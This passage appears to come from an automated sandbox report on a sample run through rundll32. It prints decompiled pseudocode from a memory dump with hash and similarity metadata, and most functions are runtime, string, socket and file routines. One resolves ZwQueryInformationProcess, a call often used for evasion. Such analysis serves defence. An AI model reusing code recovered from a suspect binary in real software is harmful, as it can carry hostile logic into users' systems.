				if ( *((intOrPtr*)(__rcx + 0x18)) == __rsi) goto 0xc80cbd32;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0xc80cbef6;
				_t104 = __edi | 0xffffffff;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0xc80cbec3;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0xc80cbed8;
				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0xc80cbda0;
				_t130 =  *((char*)(__rcx + 0x41));
				goto 0xc80cbda2;
				_t89 = ( *(__rcx + 0xc81002b0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t89;
				if (_t89 == 8) goto 0xc80cbf0e;
				_t113 = _t89;
				if (_t113 == 0) goto 0xc80cbeb7;
				if (_t113 == 0) goto 0xc80cbea3;
				if (_t113 == 0) goto 0xc80cbe6e;
				if (_t113 == 0) goto 0xc80cbe42;
				if (_t113 == 0) goto 0xc80cbe3a;
				if (_t113 == 0) goto 0xc80cbe0d;
				if (_t113 == 0) goto 0xc80cbe00;
				if (_t89 - 0xfffffffffffffffc != 1) goto 0xc80cbf1e;
				E00000285285C80CCCD8( *((char*)(__rcx + 0x41)), __rcx, __rcx, __rsi, 0xc81002b0);
				goto 0xc80cbebf;
				E00000285285C80CC73C(_t130, _t135);
				goto 0xc80cbebf;
				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0xc80cbe24;
				E00000285285C80CB9FC(_t135, _t135, _t135 + 0x38);
				goto 0xc80cbebf;
				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
				_t96 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
				_t97 =  <  ? _t104 : _t96;
				 *(_t135 + 0x38) =  <  ? _t104 : _t96;
				goto 0xc80cbe6a;
				 *(_t135 + 0x38) = 0;
				goto 0xc80cbec3;
				if ( *((char*)(_t135 + 0x41)) == 0x2a) goto 0xc80cbe4e;
				goto 0xc80cbe17;
				 *((long long*)(_t135 + 0x20)) =  *((long long*)(_t135 + 0x20)) + 8;
				_t98 =  *( *((intOrPtr*)(_t135 + 0x20)) - 8);
				 *(_t135 + 0x34) = _t98;
				if (_t98 >= 0) goto 0xc80cbe6a;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
				 *(_t135 + 0x34) =  ~_t98;
				goto 0xc80cbebf;
				_t81 =  *((intOrPtr*)(_t135 + 0x41));
				if (_t81 == 0x20) goto 0xc80cbe9d;
				if (_t81 == 0x23) goto 0xc80cbe97;
				if (_t81 == 0x2b) goto 0xc80cbe91;
				if (_t81 == 0x2d) goto 0xc80cbe8b;
				if (_t81 != 0x30) goto 0xc80cbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000008;
				goto 0xc80cbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000004;
				goto 0xc80cbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000001;
				goto 0xc80cbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000020;
				goto 0xc80cbec3;
				 *(_t135 + 0x30) =  *(_t135 + 0x30) | 0x00000002;
				goto 0xc80cbec3;
				 *(_t135 + 0x30) = _t145;
				 *((intOrPtr*)(_t135 + 0x40)) = sil;
				 *(_t135 + 0x38) = _t104;
				 *((intOrPtr*)(_t135 + 0x3c)) = 0;
				 *((intOrPtr*)(_t135 + 0x54)) = sil;
				goto 0xc80cbec3;
				if (E00000285285C80CC420(_t135) == 0) goto 0xc80cbf1e;
				_t100 =  *((intOrPtr*)( *((intOrPtr*)(_t135 + 0x18))));
				 *((char*)(_t135 + 0x41)) = _t100;
				if (_t100 != 0) goto 0xc80cbd78;
				 *((long long*)(_t135 + 0x18)) =  *((long long*)(_t135 + 0x18)) + 1;
				if ( *((intOrPtr*)(_t135 + 0x2c)) == 0) goto 0xc80cbee3;
				if ( *((intOrPtr*)(_t135 + 0x2c)) != 7) goto 0xc80cbf0e;
				 *((intOrPtr*)(_t135 + 0x470)) =  *((intOrPtr*)(_t135 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t135 + 0x470)) != 2) goto 0xc80cbd6d;
				return  *((intOrPtr*)(_t135 + 0x28));
			}













                0x285c80cbd10
                0x285c80cbd10
                0x285c80cbd15
                0x285c80cbd1a
                0x285c80cbd26
                0x285c80cbd30
                0x285c80cbd32
                0x285c80cbd37
                0x285c80cbd3d
                0x285c80cbd45
                0x285c80cbd4e
                0x285c80cbd50
                0x285c80cbd5d
                0x285c80cbd63
                0x285c80cbd6d
                0x285c80cbd70
                0x285c80cbd73
                0x285c80cbd78
                0x285c80cbd7f
                0x285c80cbd8f
                0x285c80cbd91
                0x285c80cbd9e
                0x285c80cbdad
                0x285c80cbdb0
                0x285c80cbdb6
                0x285c80cbdbc
                0x285c80cbdbe
                0x285c80cbdc7
                0x285c80cbdd0
                0x285c80cbdd9
                0x285c80cbdde
                0x285c80cbde3
                0x285c80cbde8
                0x285c80cbded
                0x285c80cbdf6
                0x285c80cbdfb
                0x285c80cbe03
                0x285c80cbe08
                0x285c80cbe11
                0x285c80cbe1a
                0x285c80cbe1f
                0x285c80cbe24
                0x285c80cbe2d
                0x285c80cbe32
                0x285c80cbe35
                0x285c80cbe38
                0x285c80cbe3a
                0x285c80cbe3d
                0x285c80cbe46
                0x285c80cbe4c
                0x285c80cbe4e
                0x285c80cbe57
                0x285c80cbe5a
                0x285c80cbe5f
                0x285c80cbe61
                0x285c80cbe67
                0x285c80cbe6c
                0x285c80cbe6e
                0x285c80cbe73
                0x285c80cbe77
                0x285c80cbe7b
                0x285c80cbe7f
                0x285c80cbe83
                0x285c80cbe85
                0x285c80cbe89
                0x285c80cbe8b
                0x285c80cbe8f
                0x285c80cbe91
                0x285c80cbe95
                0x285c80cbe97
                0x285c80cbe9b
                0x285c80cbe9d
                0x285c80cbea1
                0x285c80cbea3
                0x285c80cbea7
                0x285c80cbeab
                0x285c80cbeae
                0x285c80cbeb1
                0x285c80cbeb5
                0x285c80cbec1
                0x285c80cbec7
                0x285c80cbec9
                0x285c80cbece
                0x285c80cbed4
                0x285c80cbedb
                0x285c80cbee1
                0x285c80cbee3
                0x285c80cbef0
                0x285c80cbf0d

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: $*
                • API String ID: 3215553584-3982473090
                • Opcode ID: f52ae4847fa9419645cbaf3967d967969e9c3a329a324c659f092c552a6c69fe
                • Instruction ID: 7e2a1d4cb2cc288c6e1e6fc6a50f7fca4ad858c97aa397ccb5e9bb132ef88e0d
                • Opcode Fuzzy Hash: f52ae4847fa9419645cbaf3967d967969e9c3a329a324c659f092c552a6c69fe
                • Instruction Fuzzy Hash: 5B61747A606B7096E7699F39906936D3BE0F306F48F14911BDB4622299CF38C481DF46
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8099AE0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 130libraryloaderCOMMON
                Download Yara Rule
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: AddressHandleModuleProc
                • String ID: ZwQueryInformationProcess$ntdll.dll
                • API String ID: 1646373207-132032222
                • Opcode ID: d655376752550ca0c6d4ae3c3a63118fda60ee9f0094e96fdfb3eba170af42ae
                • Instruction ID: 86633f84d5db1fb137e56f43a6b7aaf9466aa6b075287d5d3b5c17ba7dc5d4f2
                • Opcode Fuzzy Hash: d655376752550ca0c6d4ae3c3a63118fda60ee9f0094e96fdfb3eba170af42ae
                • Instruction Fuzzy Hash: 4C518A79312FA082EF65CF19E80439937A0FB88BC4F44802A9A5D67798DF3DD605CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80DFE44 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 126COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 30%
                			E00000285285C80DFE44(void* __edx, void* __esp, void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8) {
				int _t35;
				int _t38;
				signed long long _t76;
				signed long long _t78;
				intOrPtr* _t86;
				signed long long _t93;
				signed long long _t108;
				void* _t109;
				void* _t110;
				void* _t111;

				_t110 = _t109 - 0x60;
				_t108 = _t110 + 0x30;
				 *((long long*)(_t108 + 0x60)) = __rbx;
				 *((long long*)(_t108 + 0x68)) = __rsi;
				 *((long long*)(_t108 + 0x70)) = __rdi;
				_t76 =  *0xc814c720; // 0xee50a592130
				 *(_t108 + 0x20) = _t76 ^ _t108;
				r13d = __edx;
				r15d = r9d;
				E00000285285C80CA5D4(_t76 ^ _t108, __rbx, _t108, __rcx);
				if ( *((intOrPtr*)(_t108 + 0x88)) != 0) goto 0xc80dfe97;
				_t78 =  *((intOrPtr*)(_t108 + 8));
				 *(_t108 + 0x90) =  ~( *(_t108 + 0x90));
				r9d = r15d;
				asm("sbb edx, edx");
				 *(_t110 + 0x28) =  *(_t110 + 0x28) & 0x00000000;
				 *(_t110 + 0x20) =  *(_t110 + 0x20) & 0x00000000;
				_t35 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t35 != 0) goto 0xc80dfecb;
				goto 0xc80dffbc;
				_t104 = _t35 + _t35;
				_t15 = _t104 + 0x10; // 0x18
				asm("dec eax");
				if ((_t15 & _t78) == 0) goto 0xc80dff55;
				_t18 = _t104 + 0x10; // 0x18
				_t93 = _t18;
				asm("dec eax");
				_t19 = _t104 + 0x10; // 0x18
				if ((_t78 & _t93) - 0x400 > 0) goto 0xc80dff33;
				asm("dec eax");
				_t20 = (_t93 & _t19) + 0xf; // 0x27
				if (_t20 - (_t93 & _t19) > 0) goto 0xc80dff15;
				E00000285285C80C5A80();
				_t111 = _t110 - 0xfffffff0;
				_t86 = _t111 + 0x30;
				if (_t86 == 0) goto 0xc80dffa4;
				 *_t86 = 0xcccc;
				goto 0xc80dff4f;
				asm("dec eax");
				E00000285285C80D3D7C(0xffffffffffffff0, _t93 & _t19 & 0xfffffff0);
				if (0xfffffff0 == 0) goto 0xc80dff57;
				 *((intOrPtr*)(0xffffffffffffff0)) = 0xdddd;
				goto 0xc80dff57;
				if (0xfffffff0 == 0) goto 0xc80dffa4;
				E00000285285C80C8EF0( *((intOrPtr*)(_t78 + 0xc)), 0, 0, __esp, 0xfffffff0, __rcx, _t35 + _t35, _t35 + _t35);
				r9d = r15d;
				 *((intOrPtr*)(_t111 + 0x28)) = r14d;
				 *((long long*)(_t111 + 0x20)) = 0xfffffff0;
				_t38 = MultiByteToWideChar(??, ??, ??, ??, ??, ??);
				if (_t38 == 0) goto 0xc80dffa4;
				r8d = _t38;
				GetStringTypeW(??, ??, ??, ??);
				goto 0xc80dffa6;
				if (0xfffffff0 == 0) goto 0xc80dffbc;
				if ( *((intOrPtr*)(0xffffffffffffff0)) != 0xdddd) goto 0xc80dffbc;
				E00000285285C80DA780(0xffffffffffffff0, 0xffffffffffffff0);
				if ( *((char*)(_t108 + 0x18)) == 0) goto 0xc80dffcd;
				 *( *_t108 + 0x3a8) =  *( *_t108 + 0x3a8) & 0xfffffffd;
				return E00000285285C80C59D0(r13d,  *(_t108 + 0x20) ^ _t108, 0xfffffff0,  *((intOrPtr*)(_t108 + 0x80)));
			}













                0x285c80dfe4e
                0x285c80dfe52
                0x285c80dfe57
                0x285c80dfe5b
                0x285c80dfe5f
                0x285c80dfe63
                0x285c80dfe6d
                0x285c80dfe71
                0x285c80dfe74
                0x285c80dfe81
                0x285c80dfe8e
                0x285c80dfe90
                0x285c80dfe97
                0x285c80dfe9d
                0x285c80dfea5
                0x285c80dfea7
                0x285c80dfeac
                0x285c80dfeb7
                0x285c80dfec2
                0x285c80dfec6
                0x285c80dfece
                0x285c80dfed1
                0x285c80dfed8
                0x285c80dfede
                0x285c80dfee0
                0x285c80dfee0
                0x285c80dfee7
                0x285c80dfef3
                0x285c80dfef7
                0x285c80dfefc
                0x285c80dff02
                0x285c80dff09
                0x285c80dff19
                0x285c80dff1e
                0x285c80dff21
                0x285c80dff29
                0x285c80dff2b
                0x285c80dff31
                0x285c80dff36
                0x285c80dff3c
                0x285c80dff47
                0x285c80dff49
                0x285c80dff53
                0x285c80dff5a
                0x285c80dff64
                0x285c80dff69
                0x285c80dff6c
                0x285c80dff74
                0x285c80dff80
                0x285c80dff88
                0x285c80dff91
                0x285c80dff9a
                0x285c80dffa2
                0x285c80dffa9
                0x285c80dffb5
                0x285c80dffb7
                0x285c80dffc0
                0x285c80dffc6
                0x285c80dfff4

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharMultiWide$StringType
                • String ID: %02x
                • API String ID: 3586891840-560843007
                • Opcode ID: 50be4d76a5020c7621fae6dd6c17a6d71fff3724fac27709a11fefaade9f821a
                • Instruction ID: f8227310f82b17680748f45a98708285d265cab369ac239cfdd2fb94472a09d4
                • Opcode Fuzzy Hash: 50be4d76a5020c7621fae6dd6c17a6d71fff3724fac27709a11fefaade9f821a
                • Instruction Fuzzy Hash: 7C41923A312FA04AEF218F65D8087996391FB45BA8F48C627AA5D577D4DF3CC545CB00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8061DF0 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                Download Yara Rule
                C-Code - Quality: 15%
                			E00000285285C8061DF0(long long __rax, long long __rbx, long long __rcx, signed char* __rdx, long long __rsi, void* __r9, void* __r10, long long __r13, intOrPtr _a8, long long _a16, long long _a24, long long _a32) {
				char _v64;
				long long _v72;
				long long _v80;
				long long _v88;
				intOrPtr _v104;
				signed char _t40;
				void* _t42;
				void* _t55;
				long long _t80;
				long long _t81;
				long long _t105;
				long long _t106;
				long long _t107;
				long long _t119;
				void* _t124;

				_t105 = __rsi;
				_t83 = __rbx;
				_t80 = __rax;
				r12d = 0;
				_t124 = __r9;
				if (__rcx == 0xffffffff) goto 0xc8061fd9;
				_a16 = __rbx;
				if (r8b == 0) goto 0xc8061e6e;
				_t40 =  *__rdx & 0x000000ff;
				if ((_t40 & 0x00000008) == 0) goto 0xc8061e6e;
				_a8 = r12d;
				_v88 = __rcx;
				_v80 = __rcx;
				 *__rdx = _t40 | 0x00000008;
				_v72 = _t119;
				r8d = 0x80;
				_v104 = 4;
				__imp__#21();
				_t42 = E00000285285C8061CE0(0xff00 | (_t40 | 0x00000008) != 0x00000000, __rbx,  &_v88, __rdx, __rsi);
				__imp__#3();
				E00000285285C8061CE0((0xff00 | (_t40 | 0x00000008) != 0x00000000) & 0xffffff00 | _t42 != 0x00000000, _t83, __r9, __rdx, _t105);
				if (_t42 == 0) goto 0xc8061fd5;
				_a24 = _t105;
				_a32 = __r13;
				E00000285285C805F380(__r9, __rdx);
				_t106 = _t80;
				_v88 = _t80;
				_v80 = _t80;
				if ( *((intOrPtr*)(_t106 + 8)) + 0xda812030 - 1 <= 0) goto 0xc8061ed8;
				 *((intOrPtr*)( *_t106 + 0x30))();
				goto 0xc8061eda;
				_t21 =  &_v64; // 0x4d54ee85da812018
				_t81 = _t80 + 2;
				_v88 = 0x2733;
				_v72 = _t81;
				_t93 = __r9;
				asm("movsd xmm1, [ebp-0x20]");
				_v80 = _t106;
				asm("movups xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x8], xmm1");
				asm("movups [ebp-0x18], xmm0");
				if (E00000285285C8060200(_t83, __r9, _t21) != 0) goto 0xc8061f7c;
				E00000285285C805F380(_t93, _t21);
				_t107 = _t81;
				_v88 = _t81;
				_v80 = _t81;
				if ( *((intOrPtr*)(_t107 + 8)) + 0xda812030 - 1 <= 0) goto 0xc8061f42;
				 *((intOrPtr*)( *_t107 + 0x30))();
				goto 0xc8061f44;
				_t29 =  &_v64; // 0x4d54ee85da812018
				_v88 = 0x4d5;
				_v72 = _t81 + 2;
				asm("movsd xmm1, [ebp-0x20]");
				_v80 = _t107;
				asm("movups xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x8], xmm1");
				asm("movups [ebp-0x18], xmm0");
				_t55 = E00000285285C8060200(_t83, _t124, _t29);
				if (_t55 == 0) goto 0xc8061fae;
				_a8 = r12d;
				__imp__#10();
				 *__rdx =  *__rdx & 0x000000fc;
				__imp__#3();
				E00000285285C8061CE0(0x80046600 | _t55 != 0x00000000, _t83, _t124, _t29, _t107);
				return _t55;
			}


















                0x285c8061df0
                0x285c8061df0
                0x285c8061df0
                0x285c8061e00
                0x285c8061e03
                0x285c8061e10
                0x285c8061e16
                0x285c8061e21
                0x285c8061e23
                0x285c8061e28
                0x285c8061e2c
                0x285c8061e32
                0x285c8061e36
                0x285c8061e3e
                0x285c8061e48
                0x285c8061e4c
                0x285c8061e52
                0x285c8061e5a
                0x285c8061e69
                0x285c8061e71
                0x285c8061e81
                0x285c8061e88
                0x285c8061e8e
                0x285c8061e96
                0x285c8061e9e
                0x285c8061ea3
                0x285c8061eb2
                0x285c8061eb6
                0x285c8061ec5
                0x285c8061ed2
                0x285c8061ed6
                0x285c8061edd
                0x285c8061ee1
                0x285c8061ee5
                0x285c8061eec
                0x285c8061ef0
                0x285c8061ef3
                0x285c8061ef8
                0x285c8061efc
                0x285c8061f00
                0x285c8061f05
                0x285c8061f10
                0x285c8061f12
                0x285c8061f17
                0x285c8061f1c
                0x285c8061f20
                0x285c8061f2f
                0x285c8061f3c
                0x285c8061f40
                0x285c8061f47
                0x285c8061f4f
                0x285c8061f56
                0x285c8061f5d
                0x285c8061f62
                0x285c8061f66
                0x285c8061f6a
                0x285c8061f6f
                0x285c8061f73
                0x285c8061f7a
                0x285c8061f80
                0x285c8061f8c
                0x285c8061f92
                0x285c8061f99
                0x285c8061fa9
                0x285c8061fd4

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: closesocket$ioctlsocketsetsockopt
                • String ID:
                • API String ID: 566113833-0
                • Opcode ID: efa8571a8444c449b1d94ebecc2b80b89608ef7e52b86e5e4d7699ec720f0bdf
                • Instruction ID: 84f192c8cd43838210ed2195b75ee26fe557071ec538bd100be448133db008b0
                • Opcode Fuzzy Hash: efa8571a8444c449b1d94ebecc2b80b89608ef7e52b86e5e4d7699ec720f0bdf
                • Instruction Fuzzy Hash: 9A518036B11F608AF760CF76A8453AE33B4F749B98F048116EE9967B86DF38C0958714
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C80D3B0C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 92%
                			E00000285285C80D3B0C(signed int __edx, void* __edi, void* __esp, intOrPtr* __rax, long long __rbx, signed int* __rcx, void* __rdx, long long __rsi, void* __r8, long long _a8, long long _a24, signed short _a32, intOrPtr _a40) {
				void* _v8;
				char _v16;
				intOrPtr* _v32;
				char _v40;
				void* __rdi;
				void* _t17;
				intOrPtr* _t43;
				void* _t55;

				_a8 = __rbx;
				_a24 = __rsi;
				_a32 = r9w;
				_t55 = __rdx;
				if (__rdx != 0) goto 0xc80d3b42;
				if (__r8 == 0) goto 0xc80d3b42;
				if (__rcx == 0) goto 0xc80d3b3b;
				 *__rcx =  *__rcx & __edx;
				goto 0xc80d3bd1;
				if (__rcx == 0) goto 0xc80d3b4a;
				 *__rcx =  *__rcx | 0xffffffff;
				if (__r8 - 0x7fffffff <= 0) goto 0xc80d3b66;
				_t17 = E00000285285C80D3944(__rax);
				 *__rax = 0x16;
				E00000285285C80CAABC(_t17);
				goto 0xc80d3bcf;
				E00000285285C80CA5D4(__rax, __rcx,  &_v40, _a40);
				_t43 = _v32;
				if ( *((long long*)(_t43 + 0x138)) != 0) goto 0xc80d3c00;
				if ((_a32 & 0x0000ffff) - 0xff <= 0) goto 0xc80d3be3;
				if (_t55 == 0) goto 0xc80d3bb0;
				if (__r8 == 0) goto 0xc80d3bb0;
				E00000285285C80C8EF0(0xff, 0, __edi, __esp, _t55, _a40, __r8, __r8);
				E00000285285C80D3944(_t43);
				 *_t43 = 0x2a;
				if (_v16 == 0) goto 0xc80d3bcf;
				 *(_v40 + 0x3a8) =  *(_v40 + 0x3a8) & 0xfffffffd;
				return 0x2a;
			}











                0x285c80d3b0c
                0x285c80d3b11
                0x285c80d3b16
                0x285c80d3b24
                0x285c80d3b2d
                0x285c80d3b32
                0x285c80d3b37
                0x285c80d3b39
                0x285c80d3b3d
                0x285c80d3b45
                0x285c80d3b47
                0x285c80d3b51
                0x285c80d3b53
                0x285c80d3b5d
                0x285c80d3b5f
                0x285c80d3b64
                0x285c80d3b73
                0x285c80d3b78
                0x285c80d3b85
                0x285c80d3b97
                0x285c80d3b9c
                0x285c80d3ba1
                0x285c80d3bab
                0x285c80d3bb0
                0x285c80d3bba
                0x285c80d3bc1
                0x285c80d3bc8
                0x285c80d3be2

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                • String ID:
                • API String ID: 4141327611-0
                • Opcode ID: b3cd6b7fc60e91ab56e39b8c7ca69b1ba7915d71728f58b11bac7416403998d9
                • Instruction ID: 764fd098a7b3c89efb6a23a10319ef88cf39aad127ff03d3e6c19272ef525e70
                • Opcode Fuzzy Hash: b3cd6b7fc60e91ab56e39b8c7ca69b1ba7915d71728f58b11bac7416403998d9
                • Instruction Fuzzy Hash: E541A87E207FA086FB659F54D148369A690EB40BA0F16C12BDF9527AD5EF3CC8468F01
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8089A80 Relevance: 6.1, APIs: 4, Instructions: 75threadfileCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00000285285C8089A80(void* __esi, void* __ebp, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __rbp, long long __r8, void* __r9, long long _a16, long long _a24, long long _a32, void* _a40, intOrPtr _a72, long long _a88, void* _a96, long long _a120, void* _a128, intOrPtr _a136, void* _a144, long long _a152) {
				int _t34;
				long _t35;
				void* _t39;
				long long _t73;
				void* _t85;
				void* _t86;

				_a16 = __rbx;
				_a32 = __rdi;
				_a24 = __r8;
				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0xc8089aaf;
				 *((intOrPtr*)(__rdx + 8)) = GetCurrentThreadId();
				goto 0xc8089ac1;
				if ( *((intOrPtr*)(__rdx + 8)) == GetCurrentThreadId()) goto 0xc8089ac1;
				 *((intOrPtr*)(__rdx + 8)) = 0xffffffff;
				asm("lock inc dword [eax+0x30]");
				if ( *__rdx != 0xffffffff) goto 0xc8089af6;
				r9d = 0;
				r8d = 0x2719;
				_pop(_t85);
				goto E00000285285C8089130;
				if ( *((long long*)(_t85 + 8)) != 0) goto 0xc8089b21;
				r9d = 0;
				r8d = 0;
				_pop(_t86);
				goto E00000285285C8089130;
				_a120 = __rsi;
				_t73 = _a152;
				_a136 = 0;
				_a88 = _t73;
				 *((long long*)(_t73 + 0x10)) =  *((intOrPtr*)(__rcx + 0x28));
				r8d =  *(_t86 + 8);
				_t34 = WriteFile(??, ??, ??, ??, ??);
				_t35 = GetLastError();
				if (_t34 != 0) goto 0xc8089b7f;
				if (_t35 == 0x3e5) goto 0xc8089b7f;
				if (_t35 == 0xea) goto 0xc8089b7f;
				r9d = _a136;
				r8d = _t35;
				E00000285285C8089130(_t39, _t35 - 0xea,  *((intOrPtr*)(__rcx + 0x28)), _a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _a88, _t73);
				goto 0xc8089b8b;
				return E00000285285C8089090(_a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _t73);
			}









                0x285c8089a80
                0x285c8089a85
                0x285c8089a8a
                0x285c8089aa2
                0x285c8089aaa
                0x285c8089aad
                0x285c8089ab8
                0x285c8089aba
                0x285c8089ac5
                0x285c8089acd
                0x285c8089ad4
                0x285c8089adb
                0x285c8089aef
                0x285c8089af1
                0x285c8089afb
                0x285c8089b02
                0x285c8089b09
                0x285c8089b1a
                0x285c8089b1c
                0x285c8089b23
                0x285c8089b28
                0x285c8089b32
                0x285c8089b36
                0x285c8089b3b
                0x285c8089b3f
                0x285c8089b49
                0x285c8089b51
                0x285c8089b59
                0x285c8089b60
                0x285c8089b67
                0x285c8089b69
                0x285c8089b6e
                0x285c8089b78
                0x285c8089b7d
                0x285c8089ba0

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: CurrentThread$ErrorFileLastWrite
                • String ID:
                • API String ID: 1327375210-0
                • Opcode ID: 590f503f063f945f456afbfa2fe40aa4c10ad34da1b69bc37942898db11d761e
                • Instruction ID: 8a23e034a26bd1f9d75bc38e59b3eedddd25227a6eced3fb480a6b33062d920d
                • Opcode Fuzzy Hash: 590f503f063f945f456afbfa2fe40aa4c10ad34da1b69bc37942898db11d761e
                • Instruction Fuzzy Hash: 4C313E3A205FA086E720DB66E14871AA7A0F788BE4F148613DF5957B98CF7CD491CF00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000285C8089BB0 Relevance: 6.1, APIs: 4, Instructions: 75threadfileCOMMON
                Download Yara Rule
                C-Code - Quality: 43%
                			E00000285285C8089BB0(void* __esi, void* __ebp, long long __rbx, void* __rcx, long long* __rdx, long long __rdi, long long __rsi, void* __rbp, long long __r8, void* __r9, long long _a16, long long _a24, long long _a32, void* _a40, intOrPtr _a72, long long _a88, void* _a96, long long _a120, void* _a128, intOrPtr _a136, void* _a144, long long _a152) {
				int _t34;
				long _t35;
				void* _t39;
				long long _t73;
				void* _t85;
				void* _t86;

				_a16 = __rbx;
				_a32 = __rdi;
				_a24 = __r8;
				if ( *((intOrPtr*)(__rdx + 8)) != 0) goto 0xc8089bdf;
				 *((intOrPtr*)(__rdx + 8)) = GetCurrentThreadId();
				goto 0xc8089bf1;
				if ( *((intOrPtr*)(__rdx + 8)) == GetCurrentThreadId()) goto 0xc8089bf1;
				 *((intOrPtr*)(__rdx + 8)) = 0xffffffff;
				asm("lock inc dword [eax+0x30]");
				if ( *__rdx != 0xffffffff) goto 0xc8089c26;
				r9d = 0;
				r8d = 0x2719;
				_pop(_t85);
				goto E00000285285C8089130;
				if ( *((long long*)(_t85 + 8)) != 0) goto 0xc8089c51;
				r9d = 0;
				r8d = 0;
				_pop(_t86);
				goto E00000285285C8089130;
				_a120 = __rsi;
				_t73 = _a152;
				_a136 = 0;
				_a88 = _t73;
				 *((long long*)(_t73 + 0x10)) =  *((intOrPtr*)(__rcx + 0x28));
				r8d =  *(_t86 + 8);
				_t34 = ReadFile(??, ??, ??, ??, ??);
				_t35 = GetLastError();
				if (_t34 != 0) goto 0xc8089caf;
				if (_t35 == 0x3e5) goto 0xc8089caf;
				if (_t35 == 0xea) goto 0xc8089caf;
				r9d = _a136;
				r8d = _t35;
				E00000285285C8089130(_t39, _t35 - 0xea,  *((intOrPtr*)(__rcx + 0x28)), _a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _a88, _t73);
				goto 0xc8089cbb;
				return E00000285285C8089090(_a72,  *((intOrPtr*)(_a88 + 0x28)), _t73, _t73);
			}









                0x285c8089bb0
                0x285c8089bb5
                0x285c8089bba
                0x285c8089bd2
                0x285c8089bda
                0x285c8089bdd
                0x285c8089be8
                0x285c8089bea
                0x285c8089bf5
                0x285c8089bfd
                0x285c8089c04
                0x285c8089c0b
                0x285c8089c1f
                0x285c8089c21
                0x285c8089c2b
                0x285c8089c32
                0x285c8089c39
                0x285c8089c4a
                0x285c8089c4c
                0x285c8089c53
                0x285c8089c58
                0x285c8089c62
                0x285c8089c66
                0x285c8089c6b
                0x285c8089c6f
                0x285c8089c79
                0x285c8089c81
                0x285c8089c89
                0x285c8089c90
                0x285c8089c97
                0x285c8089c99
                0x285c8089c9e
                0x285c8089ca8
                0x285c8089cad
                0x285c8089cd0

                APIs
                Memory Dump Source
                • Source File: 00000013.00000002.549903895.00000285C8050000.00000040.10000000.00040000.00000000.sdmp, Offset: 00000285C8050000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_19_2_285c8050000_rundll32.jbxd
                Yara matches
                Similarity
